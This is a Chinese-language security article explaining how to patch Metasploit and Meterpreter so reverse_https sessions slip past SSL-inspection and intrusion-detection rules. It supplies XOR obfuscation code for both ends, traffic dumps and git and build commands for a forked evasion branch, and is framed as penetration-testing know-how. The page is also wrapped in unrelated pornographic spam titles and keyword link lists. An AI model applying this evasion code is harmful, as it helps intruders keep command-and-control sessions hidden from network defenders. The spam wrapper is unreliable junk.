成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Meterpreter:逃避SSL檢測

安全 應用安全 黑客攻防
當執行滲透測試時,SSL檢測或許會讓你頭疼整整一天。這里有一個概念驗證,如何調整Metasploit源來逃避SSL檢測。

當執行滲透測試時,SSL檢測或許會讓你頭疼整整一天。這里有一個概念驗證,如何調整Metasploit源來逃避SSL檢測。

[[137140]]

該方法親測有效!成功的繞過了Palo Alto的anti-meterpreter 報警策略。

SSL檢測本是用來執行中間人攻擊,因此其能夠看到純文本形式的數據包。如果你在Meterpreter會話中檢測流量,你會發現編寫識別Meterpreter的規則十分簡單。

通過在MSF代碼中增加一個Puts,我們可以轉儲原始數據。

當你drop shell的時候,這個數據從MSF發送給Meterpreter是這樣的:

[*] Starting interaction with 1...

meterpreter > shell
"\x00\x00\x00\x84\x00\x00\x00\x00\x00\x00\x00#\x00\x01\x00\x01stdapi_sys_process_execute\x00\x00\x00\x00)\x00\x01\x00\x0203778337146806943879568977592220\x00\x00\x00\x00$\x00\x01\b\xFEC:\\Windows\\system32\\cmd.exe\x00\x00\x00\x00\f\x00\x02\t\x00\x00\x00\x00\v"
Process 4012 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\student\Desktop>

仔細看看這些數據,你能找出TLV數據,一個獨特的ID,最重要的是遠程函數調用以及該函數的參數。如果你在編寫一個攔截Meterpreter的規則,肯定會觸發一個警報,因為在數據包中包含字符串“stdapi_sys_process_execute”.

偽裝數據

知道了這些,就能將數據偽裝通過引擎檢測。最普遍的方法是使用XOR,主要是它很快,可逆性,且不會改變數據長度(Base64會增加長度)等特性。在其向外擴展之前我們要做的就是XOR數據(記住,這需要在Meterpreter和MSF同時完成)

下面是在MSF接收方添加代碼

def dispatch_request(cli, request)  

xor_byte = request.raw_uri[7]  
xored_body = String.new  
i = 0  

request.body.each_byte do |b|    
# don't touch the TlvHeader (first 8 bytes)    if i > 7      
xored_body << (b.ord ^ xor_byte.ord).chr    
else      
xored_body << b    
end    
i += 1  
end  
# use the new string  request.body = xored_body

在Meterpreter接收方:

ULONG i = 0;for (; i < payloadLength; ++i)    
payload[i] ^= xorByte;

記住,只要兩邊xor_byte/xorByte變量的值相同,那么變量的值就不重要了,因為兩方都知道這個隨機生成的URI。

對添加的代碼進行模糊處理,再次使用shell命令就不會遇到煩人的“stdapi_sys_process_execute”字符串:

[*] Starting interaction with 1...
meterpreter > shell
"\x00\x00\x00\x84\x00\x00\x00\x00lllOlmlm\x1F\x18\b\r\x1C\x053\x1F\x15\x1F3\x1C\x1E\x03\x0F\t\x1F\x1F3\t\x14\t\x0F\x19\x18\tllllElmlnYXXT__[TYX[^U_]]T_\\^\\_YZYY\\X\\X\\[llllHlmd\x92/V0;\x05\x02\b\x03\e\x1F0\x1F\x15\x1F\x18\t\x01_^0\x0F\x01\bB\t\x14\tllll`lnellllg"
Process 3736 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. 
All rights reserved.
C:\Users\student\Desktop>

這樣設置是需要你重新生成Meterpreter DLLs的,詳情可以參考rapid7

在Windows中,你首先需要:

$ git clone  https://github.com/rwhitcroft/meterpreter
$ cd meterpreter
$ git submodule init && git submodule update
$ git checkout evade_ssl_inspection

接著在命令行入口,運行make x64生成DLLs。它將被放置在output/x64/文件夾下面,將其復制到/opt/metasploit-framework/data/meterpreter/覆蓋掉MSF默認的DLLs(并非所有的DLLs都需要復制,但為了簡單操作,就全部復制了)

在MSF端:

$ git clone https://github.com/rwhitcroft/metasploit-framework
$ cd metasploit-framework
$ bundle install
$ git checkout evade_ssl_inspection

就這樣,你現在可以像往常一樣運行msfconsole,并且還可以逃避SSL檢測。

記住,這僅適用于windows/x64/meterpreter/reverse_https payload,因為這是我的最愛。將該功能添加到reverse_tcp,同樣能夠達到這樣的效果。

責任編輯:藍雨淚
相關推薦

2012-11-19 13:25:21

2020-09-21 06:47:11

勒索軟件VMMaze

2019-02-19 09:25:42

2024-01-03 17:32:53

2017-05-02 15:50:49

2023-06-25 18:00:00

人工智能ChatGPT網絡安全

2023-11-08 14:23:55

2012-12-26 09:42:51

2015-04-22 15:24:31

2016-11-13 16:46:49

2025-03-27 07:00:00

惡意軟件移動安全網絡安全

2021-03-16 10:36:38

網絡釣魚安全檢測網絡安全

2013-03-27 09:36:49

2024-08-06 09:48:49

2025-06-24 10:09:54

2025-06-03 08:10:00

網絡安全終端安全木馬

2010-09-08 10:54:37

2015-02-27 16:10:25

2021-08-14 20:25:12

Shell攻擊檢測逃避

2019-11-24 23:32:10

DDoS攻擊網絡攻擊網絡威脅
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 中文字幕一区二区三区乱码在线 | 夜夜精品浪潮av一区二区三区 | 成人国产精品久久久 | 三a毛片 | 色综合久久天天综合网 | 狠狠亚洲| 成人aaa视频| 亚洲精品久久久久久国产精华液 | 日韩亚洲视频 | 羞羞色在线观看 | 97偷拍视频 | 亚洲视频手机在线 | 蜜臀久久99精品久久久久久宅男 | 日日夜夜免费精品视频 | 99国产精品99久久久久久 | 日韩伦理一区二区三区 | 国产做a爱片久久毛片 | 精品久久国产 | 国产成人av在线 | 日韩国产中文字幕 | 青娱乐国产 | 国产精品成人久久久久 | 精品久久一区 | 亚洲中国字幕 | 中文字幕专区 | 亚洲国产精品一区二区三区 | 国产精品夜色一区二区三区 | 最新一级毛片 | 国产一区二区三区色淫影院 | 免费一级片 | 亚洲国产成人精品女人久久久 | 成人做爰www免费看 午夜精品久久久久久久久久久久 | 成人欧美一区二区三区黑人孕妇 | 天天干天天操天天看 | 久久久久国产一区二区三区 | 久久夜视频 | 久草视频观看 | 婷婷久 | 日韩福利视频 | 免费v片| 中文字幕综合 |